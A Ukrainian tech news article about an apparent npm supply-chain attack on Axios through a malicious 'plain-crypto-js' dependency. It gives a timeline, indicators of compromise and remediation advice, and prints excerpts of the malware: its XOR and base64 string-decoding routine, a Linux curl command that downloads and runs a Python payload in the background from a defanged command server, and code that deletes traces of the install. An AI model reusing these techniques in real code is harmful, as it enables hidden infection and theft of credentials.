Axios став жертвою атаки на ланцюг постачання

Тільки нещодавно відійшли від атаки на ланцюг постачання Litellm в PyPi, так сьогодні вночі хакери скомпрометували Axios — один із найпопулярніших HTTP-клієнтів у світі JavaScript, який завантажують понад 100 мільйонів разів на тиждень і майже скрізь використовують.

Дослідники виявили, що хакери змогли опублікувати заражені версії Axios прямо в npm, оминувши офіційний репозиторій на GitHub.

Як все відбувалося

Атака відбулася поза стандартним процесом публікації. Зазвичай Axios публікує теги релізів на GitHub одночасно з публікацією в npm. Але заражені версії [email protected] та [email protected] в офіційних тегах проєкту не з’явилися (останнім тегом був v1.14.0).

Розробники Axios спочатку навіть не могли повернути контроль над проєктом, бо зловмисник мав вищі права доступу, ніж вони самі. Все через те, що стався витік довгострокового токена npm, який використовувався паралельно з довіреними методами публікації.

Хронологія зараження:

1. За 18 годин до атаки хтось із поштою [email protected] публікує пакет [email protected]. Це була копія легітимної бібліотеки crypto-js.
2. 30 березня 2026 року о 23:59 UTC публікується шкідлива версія [email protected]. Автором вказано jasonsaayman.
3. У найближчі 39 хвилин хакери публікують [email protected] та [email protected], єдина зміна в яких — це додавання цієї шкідливої залежності.

Будь-який проєкт, у якому стояли не суворі залежності (наприклад, ^1.14.0 або ^0.30.0), автоматично підтягнув би вірус при наступному npm install.

Ось схема того, як загалом працювала атака:

Що всередині plain-crypto-js

Згідно звіту дослідників, вірус працює через хук postinstall, що означає, що як тільки ви встановлюєте пакет, npm автоматично і непомітно запускає файл setup.js.

Щоб антивіруси не помітили підозрілих посилань чи команд, зловмисники використали кастомну дворівневу схему шифрування. Спочатку рядок перевертається задом наперед, символи _ замінюються на =, а потім усе декодується з Base64. А після цього кожен символ перекривається з цифрою з ключа OrDeR_7077 та константою 333.

const _trans_1 = function(x, r) {
  const E = r.split("").map(Number);
  return x.split("").map((x, r) => {
    const S = x.charCodeAt(0), a = E[7 * r * r % 10];
    return String.fromCharCode(S ^ a ^ 333);
  }).join("");
};
const _trans_2 = function(x, r) {
  let E = x.split("").reverse().join("").replaceAll("_", "=");
  let S = Buffer.from(E, "base64").toString("utf8");
  return _trans_1(S, r);
};
const ord = "OrDeR_7077";

Скрипт перевіряє вашу операційну систему через os.platform() і завантажує відповідне навантаження з командного сервера хакерів: http://sfrclak[.]com:8000/. Також, як виявилося, то трафік маскувався під звернення до packages[.]npm[.]org, щоб обдурити системи моніторингу.

При запуску на MacOs, cкрипт AppleScript завантажує бінарник у /Library/Caches/com.apple.act.mond, а далі цей файл запускається у фоні. Троян збирає дані про систему, процеси та директорії і відправляє їх хакерам кожні 60 секунд.

При запуску з Windows, малваря знаходить powershell, копіює його і перейменовує на %PROGRAMDATA%\wt.exe. Потім VBScript непомітно завантажує .ps1 скрипт у теку %TEMP% і виконує його з прапорцем -ep bypass.

А в Linux все взагалі простіше нікуди. Там просто завантажується Python-скрипт, який виконується у фоні.

curl -o /tmp/ld.py -d packages[.]npm[.]org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &

Як тільки малваря закріплася в системі, вона знищує докази своєї присутності, щоб папка node_modules виглядала чистою.

fs.unlink(__filename, (x => {}));
fs.unlink("package.json", (x => {}));
fs.rename("package.md", "package.json", (x => {}));

Після цього пакет виглядає як звичайний, безпечний crypto-js. І як би ви там не дивилися, все одно не зрозумієте, що зловили троян.

Що тепер робити

Якщо ви використовуєте Axios, про всяк випадок, перевірте свої проєкти.

Шукайте у своїх залежностях та lock-файлах:

• [email protected]
• [email protected]
• [email protected]

Так як скрипт викрадав системні дані, зловмисники могли легко дістатися до ваших SSH-ключів, конфігураційних файлів із вшитими паролями, токенів до хмар та інших критичних секретів.

Тому простого видалення зараженого пакета не буде достатньо. Якщо шкідливий скрипт встиг виконатися, то вам необхідно вважати всі локальні ключі, сертифікати та доступи скомпрометованими і відкликати їх та перевипустити.

Читайте також: Хакери вбудували викрадач паролів у популярну Python-бібліотеку litellm

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті